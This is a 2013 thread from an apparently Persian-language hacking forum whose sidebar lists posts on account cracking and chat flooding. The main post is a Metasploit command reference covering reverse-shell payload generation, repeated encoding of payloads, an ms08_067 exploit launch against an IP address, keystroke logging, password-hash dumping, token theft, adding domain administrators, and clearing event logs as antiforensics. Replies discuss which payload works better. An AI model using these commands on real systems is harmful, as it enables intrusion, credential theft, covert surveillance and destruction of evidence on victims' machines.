Latest topics | » سلام علیک و رحمه الله...چه خبرا بچه ها؟ by DARK Sat Apr 30, 2022 11:59 pm
» oon ghadima!!! by Inj3ctor Wed Aug 18, 2021 4:26 am
» need a source code of any server for university project help me for it by xerockss Sun Jun 09, 2019 10:28 pm
» New : Run Python based bots like Aurora, Blacksmith, VBOt in your Android Mobile by ltc_mkt Wed Feb 27, 2019 5:09 pm
» دوره ی اضافه کردن سکه به برنامه هایی همچون فالوور بگیر و ممبرگیر و ... (خریداری شده) by mr.pitza Mon Oct 01, 2018 8:10 pm
» hach any id f.a.c.e.b.o.o.k 2019 by christian777 Sat Apr 21, 2018 4:41 am
» هديه للجميع 500 نك فلوود قديم شغالين 500 old ids flood free by christian777 Mon Apr 09, 2018 6:37 pm
» Freebuzz & Nimbuzz yadet bekheyr ! by DARK Thu Apr 05, 2018 1:54 pm
» new flood 2018 فلود جديد يعمل على جميع انواع نكات لفلود القديمة والجديدة by christian777 Fri Oct 20, 2017 6:20 am
» STEALTH PROJECT WEB FLOOD NIMBUZZ by djsaim Sat Sep 30, 2017 8:51 pm
» XIO server & online bots by ltc_mkt Mon May 29, 2017 8:12 pm
» فریباز دوباره برمیگردد by Mer+sad Thu Apr 06, 2017 3:34 am
» Xio Server Updated Elite Version by lekshmi321 Wed Mar 29, 2017 11:35 am
» Join MulTi id nimbuzz 2016 by sami-alarifi Mon Dec 05, 2016 3:09 am
» انجمن تیم امنیتی آنانیموس سکوریتی by shirsefat Thu Nov 17, 2016 6:12 pm
» Xio Server Latest Version by shirsefat Thu Nov 17, 2016 6:04 pm
» amooZesh kamele hack dar yek file pdf by shirsefat Fri Nov 11, 2016 2:23 am
» CRACKER IDS 2017 WORKING by abdo-osmana Sat Oct 29, 2016 1:43 am
» NEW ... ROOM ANTI CAPCHA 2017 DESTROY ROOMS V 4 BY AL-JOOOCKER@N.C by abdo-osmana Sat Oct 29, 2016 1:41 am
» NEW FLOOD ROOM AND PV 2017 ANTI CAPTCHA by abdo-osmana Sat Oct 29, 2016 1:30 am
» add new server Work 24 hours --- تحديث حسابات السيرفرات قم بــاضافه السيرفرات الجديده تعمل 24 ساعه by abdo-osmana Sat Oct 29, 2016 1:28 am
» new auto id maker by sandy_rawat Tue Oct 04, 2016 4:24 pm
» wonderful list id arbic for crucker اكبر ليستة ايملات تخمين جديدة by christian777 Sun Sep 25, 2016 12:59 am
» New Abdo Cobra Auto Id maker Source code working by Kash007 Sat Sep 24, 2016 10:26 pm
» 2000 id flood free by christian777 Sun Sep 18, 2016 3:54 am
» new ip address changer with crack@pishaash@n.c by cebecis Sat Sep 10, 2016 3:19 am
» تجسس على الخصوصية by majed5160 Thu Aug 25, 2016 3:26 am
» سلام دوستان من by majed5160 Wed Aug 24, 2016 3:10 am
» Trusted online server bots by bom Fri Aug 19, 2016 7:59 pm
» فلود جديد ناررررر by christian777 Sat Aug 13, 2016 10:12 am
» Receive Captcha in PVT C# and VB.NET source code available by wathk Thu Jul 28, 2016 3:01 am
» Attention nimbuzz users ! by -namakul- Tue Jul 26, 2016 8:27 pm
» Salam man az karbqraye qadimiton hastam lotfan komakam konid :( by SALIJON* Sat Jul 23, 2016 6:34 pm
» Nimbuzz stylish ids for sale by msb Wed Jul 20, 2016 12:33 pm
» Nuke Mobileserver V9 by launchar Tue Jul 19, 2016 1:51 pm
» help me please c sharp masters by launchar Tue Jul 19, 2016 1:39 pm
» salam be dostane qadimi hamgi join bedin bebinm kojain :P by ghaz_ghaz90 Sat Jul 09, 2016 12:22 am
» Xio Server Update by ghaz_ghaz90 Fri Jul 08, 2016 11:15 pm
» Xio Auto Capcha ID Maker ( FASTEST IDMAKER EVER) by karthik~ajay Thu Jul 07, 2016 10:59 pm
» All web defacers and SQLi hach by mitu143 Thu Jun 16, 2016 1:24 pm
» special daface pages FreeBuzz-Team by mitu143 Thu Jun 16, 2016 12:59 pm
» Meet A Stranger Room Advertizer BoT by lekshmi321 Sun Jun 05, 2016 5:14 pm
» NEW STEALTH PROJECT WEB FLOOD NIMBUZZ by gentarbumi Sun Apr 24, 2016 10:08 pm
» Moving the write using HTML تحريك الكتابة باستخدام جافا سكرييت by faris.jra7 Sat Apr 23, 2016 11:40 pm
» فلود غرف النيمباز by saeid Sat Apr 16, 2016 12:43 am
» How to Show Hidden Files and Folders In Windows 7 by i_am~the_best Fri Apr 15, 2016 8:45 am
» How to Earn Money Online From PTC Sites by i_am~the_best Fri Apr 15, 2016 8:43 am
» Create Id and Chat by star.iraq Sun Apr 10, 2016 2:51 pm
» Addlist DC + hanger + remote v2.0 by oye Tue Apr 05, 2016 9:18 am
» XIO ADD FLOOD V.2 by lekshmi321 Fri Mar 25, 2016 8:37 pm
|
| | دستورات کامل msf | |
| | Author | Message |
---|
shirsefat T-SBD
Posts : 130 Points : 1197 Thanked : 12 Join date : 2013-03-02 ASL : hacker-iranian@n.c rem0ved New id shirsefat@n.c Reza 20 l0r anjeles Sarbaz 19/10/1392 ezam be khdmat Nimbuzz Id : shirsefat
| Subject: دستورات کامل msf Tue May 14, 2013 12:33 pm | |
| This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.
MSFconsole Commands:
Select All Code: show exploits Show all exploits within the Framework.
Select All Code: show payloads Show all payloads within the Framework.
Select All Code: show auxiliary Show all auxiliary modules within the Framework.
Select All Code: search name Search for exploits or modules within the Framework.
Select All Code: info Load information about a specific exploit or module.
Select All Code: use name Load an exploit or module (example: use windows/smb/.....).
Select All Code: LHOST Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
Select All Code: RHOST The remote host or the target.
Select All Code: set function Set a specific value (for example, LHOST or RHOST).
Select All Code: setg function Set a specific value globally (for example, LHOST or RHOST).
Select All Code: show options Show the options available for a module or exploit.
Select All Code: show targets Show the platforms supported by the exploit.
Select All Code: set target num Specify a specific target index if you know the OS and service pack.
Select All Code: set payload payload Specify the payload to use.
Select All Code: show advanced Show advanced options.
Select All Code: set autorunscript migrate -f Automatically migrate to a separate process upon exploit completion.
Select All Code: check Determine whether a target is vulnerable to an attack.
Select All Code: exploit Execute the module or exploit and attack the target.exploit -j Run the exploit under the context of the job. (This will run the exploit in the background.)
Select All Code: exploit -z Do not interact with the session after successful exploitation.
Select All Code: exploit -e encoder Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
Select All Code: exploit -h Display help for the exploit command.
Select All Code: sessions -l List available sessions (used when handling multiple shells).
Select All Code: sessions -l -v List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
Select All Code: sessions -s script Run a specific Meterpreter script on all Meterpreter live sessions.
Select All Code: sessions -K Kill all live sessions.
Select All Code: sessions -c cmd Execute a command on all live Meterpreter sessions.
Select All Code: sessions -u sessionID Upgrade a normal Win32 shell to a Meterpreter console.
Select All Code: db_create name Create a database to use with database-driven attacks (example: db_create autopwn).
Select All Code: db_connect name Create and connect to a database for driven attacks (example: db_connect autopwn).
Select All Code: db_nmap Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
Select All Code: db_autopwn -h Display help for using db_autopwn.
Select All Code: db_autopwn -p -r -e Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
Select All Code: db_destroy Delete the current database.
Select All Code: db_destroy user:password@host:p.o.r.t/database Delete database using advanced options.
Meterpreter Commands help: Open Meterpreter usage help.
Select All Code: run scriptname Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
Select All Code: sysinfo Show the system information on the compromised target.
Select All Code: ls List the files and folders on the target.
Select All Code: use priv Load the privilege extension for extended Meterpreter libraries.
Select All Code: ps Show all running processes and which accounts are associated with each process.
Select All Code: migrate PID Migrate to the specific process ID (PID is the target process ID gained from the ps command).
Select All Code: use incognito Load incognito functions. (Used for token stealing and impersonation on a target machine.)
Select All Code: list_tokens -u List available tokens on the target by user.
Select All Code: list_tokens -g List available tokens on the target by group.
Select All Code: impersonate_token DOMAIN_NAME\\USERNAME Impersonate a token available on the target.
Select All Code: steal_token PID Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.
Select All Code: getsystem Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
Select All Code: shell Drop into an interactive shell with all available tokens.
Select All Code: execute -f cmd.exe -i Execute cmd.exe and interact with it.
Select All Code: execute -f cmd.exe -i -t Execute cmd.exe with all available tokens.
Select All Code: execute -f cmd.exe -i -H -t Execute cmd.exe with all available tokens and make it a hidden process.
Select All Code: rev2self Revert back to the original user you used to compromise the target.
Select All Code: reg command Interact, create, delete, query, set, and much more in the target’s registry.
Select All Code: setdesktop number Switch to a different screen based on who is logged in.
Select All Code: screenshot Take a screenshot of the target’s screen.
Select All Code: upload file Upload a file to the target.
Select All Code: download file Download a file from the target.
Select All Code: keyscan_start Start sniffing keystrokes on the remote target.
Select All Code: keyscan_dump Dump the remote keys captured on the target.
Select All Code: keyscan_stop Stop sniffing keystrokes on the remote target.
Select All Code: getprivs Get as many privileges as possible on the target.
Select All Code: uictl enable keyboard/mouse Take control of the keyboard and/or mouse.
Select All Code: background Run your current Meterpreter shell in the background.
Select All Code: hashdump Dump all hashes on the target.
Select All Code: use sniffer Load the sniffer module.
Select All Code: sniffer_interfaces List the available interfaces on the target.
Select All Code: sniffer_dump interfaceID pcapname Start sniffing on the remote target.
Select All Code: sniffer_start interfaceID packet-buffer Start sniffing with a specific range for a packet buffer.
Select All Code: sniffer_stats interfaceID Grab statistical information from the interface you are sniffing.
Select All Code: sniffer_stop interfaceID Stop the sniffer.
Select All Code: add_user username password -h ip Add a user on the remote target.
Select All Code: add_group_user "Domain Admins" username -h ip Add a username to the Domain Administrators group on the remote target.
Select All Code: clearev Clear the event log on the target machine.
Select All Code: timestomp Change file attributes, such as creation date (antiforensics measure).
Select All Code: reboot Reboot the target machine.
MSFpayload Commands:
Select All Code: msfpayload -h List available payloads.
Select All Code: msfpayload windows/meterpreter/bind_tcp O List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
Select All Code: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on p.o.r.t 443, and then save it as a Windows Portable Executable named payload.exe.
Select All Code: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw Same as above, but export as raw format. This will be used later in msfencode
Select All Code: msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c Same as above but export as C-formatted shellcode.
Select All Code: msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java Export as %u encoded JavaScript.
MSFencode Commands:
Select All Code: msfencode -h Display the msfencode help.
Select All Code: msfencode -l List the available encoders.
Select All Code: msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho) Format to display the encoded buffer.
Select All Code: msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
Select All Code: msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe Create a multi-encoded payload.
Select All Code: msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.
MSFcli Commands:
Select All Code: msfcli | grep exploit Show only exploits.
Select All Code: msfcli | grep exploit/windows Show only Windows exploits.
Select All Code: msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on p.o.r.t 443 | |
| | | mohammad FreeBuzz Team
Posts : 2177 Points : 17268 Thanked : 39 Join date : 2013-02-24 ASL : mohammad Nimbuzz Id : parwardgara@n.c
| Subject: Re: دستورات کامل msf Tue May 14, 2013 5:56 pm | |
| mishe yeki tozih bede be che kari miad ini ke reza dade? | |
| | | lvlr.sandelfon T-SBD
Posts : 346 Points : 486 Thanked : 0 Join date : 2012-06-27 ASL : lvlr.sandelfon
| Subject: Re: دستورات کامل msf Wed May 15, 2013 8:34 pm | |
| msf hamun metasploite ke sazgarie bishtari tu linux dare behtar bud beja bind tcp az reverse_tcp estefade mikardi exploite netapi dg ro porte 445 javab nemide aksare payloada ham masalan meterpreter ejra nemishe ru systeme ba kuchiktarin firewall | |
| | | Sponsored content
| Subject: Re: دستورات کامل msf | |
| |
| | | | دستورات کامل msf | |
|
Similar topics | |
|
| Permissions in this forum: | You cannot reply to topics in this forum
| |
| |
| |